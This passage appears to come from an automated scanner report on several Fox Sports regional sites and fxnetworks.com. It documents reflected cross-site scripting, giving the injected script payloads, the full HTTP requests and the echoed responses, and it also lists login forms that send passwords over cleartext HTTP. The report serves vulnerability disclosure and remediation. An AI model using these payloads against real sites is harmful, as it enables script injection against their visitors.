Set-Cookie: PHPSESSID=ee1c5d5b31dd79682bb6121b710599cc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 36214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962^feedID=7926eb111"><script>alert(1)</script>79685f9483c^',300,500);" rel="nofollow">
...[SNIP]...

1.13. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4df24<script>alert(1)</script>c4267285f34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html4df24<script>alert(1)</script>c4267285f34 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 16:31:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 816
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html4df24<script>alert(1)</script>c4267285f34"</strong>
...[SNIP]...

1.14. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9667"><script>alert(1)</script>c95f720fdd was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214e9667"><script>alert(1)</script>c95f720fdd&feedID=4354 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:27:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=5907f57557bbb9fcefd7c02da713dd7b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 71366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="389214e9667"><script>alert(1)</script>c95f720fdd">
...[SNIP]...

1.15. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ac4"><script>alert(1)</script>791b659fd83 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354e5ac4"><script>alert(1)</script>791b659fd83 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:42 GMT
Server: Apache
Set-Cookie: PHPSESSID=c40f723c592548a3e9a1ed20e7c0b840; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 30049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214^feedID=4354e5ac4"><script>alert(1)</script>791b659fd83^',300,500);" rel="nofollow">
...[SNIP]...

1.16. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423c9"><script>alert(1)</script>d94649dd93c was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566423c9"><script>alert(1)</script>d94649dd93c&feedID=3709 HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=7eac46d2426903c53eabd6c1efede00f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 58990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="389566423c9"><script>alert(1)</script>d94649dd93c">
...[SNIP]...

1.17. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328cf"><script>alert(1)</script>d6eb460b7b8 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709328cf"><script>alert(1)</script>d6eb460b7b8 HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:24:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=61d15e7f6619b6b351041671f648e7ab; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 37507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566^feedID=3709328cf"><script>alert(1)</script>d6eb460b7b8^',300,500);" rel="nofollow">
...[SNIP]...

1.18. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4c3"><a>d8f9b2ad6a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?3e4c3"><a>d8f9b2ad6a9=1 HTTP/1.1
Host: www.fxnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 16:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 16:31:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<img src="https://beacon.scorecardresearch.com/scripts/beacon.dll?c1=2&c2=3005183&c3=&c4=www.fxnetworks.com/?3e4c3"><a>d8f9b2ad6a9=1&c5=&c6=&c7=&c15=&x=NOJAVASCRIPT" alt="" />
...[SNIP]...

1.19. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2bc"-alert(1)-"d7b03092302 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cb2bc"-alert(1)-"d7b03092302=1 HTTP/1.1
Host: www.fxnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 16:31:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 16:31:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
eout(function()
   {
       var url = "http" + (/https:/.test(document.location.href) ? "s" : "") +
       "://beacon.scorecardresearch.com/scripts/beacon.dll" +
       "?c1=2&c2=3005183&c3=&c4=www.fxnetworks.com/?cb2bc"-alert(1)-"d7b03092302=1" +
       "&c5=&c6=&c7=" + escape(document.location.href) +
       "&c8=" + escape(document.title) +
       "&c9=" + escape(document.referrer) +
       "&c10=" + escape(screen.width+'x'+screen.height) +
       "&c15="
...[SNIP]...

1.20. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ad7b6--><script>alert(1)</script>e673a2825ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?ad7b6--><script>alert(1)</script>e673a2825ae=1 HTTP/1.1
Host: www.fxnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 16:31:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 16:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<input type="hidden" name="url" value="http://www.fxnetworks.com/?ad7b6--><script>alert(1)</script>e673a2825ae=1" />
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 18 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.foxsportsarizona.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 84050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.3. http://www.foxsportscarolinas.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportscarolinas.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportscarolinas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 12 Jan 2011 16:30:48 GMT
Date: Wed, 12 Jan 2011 16:30:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/
Content-Length: 67154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.4. http://www.foxsportsdetroit.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /01/11/11/Hoke-who/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:41 GMT
Server: Apache
Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Hoke-who/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.6. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Hoke-who/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.7. http://www.foxsportsflorida.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.8. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.9. http://www.foxsportshouston.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportshouston.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportshouston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.10. http://www.foxsportskansascity.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportskansascity.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportskansascity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 67136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

2.11. http://www.foxsportsmidwest.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsmidwest.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.foxsportsmidwest.com
Accept: */*
Accept-Language: en
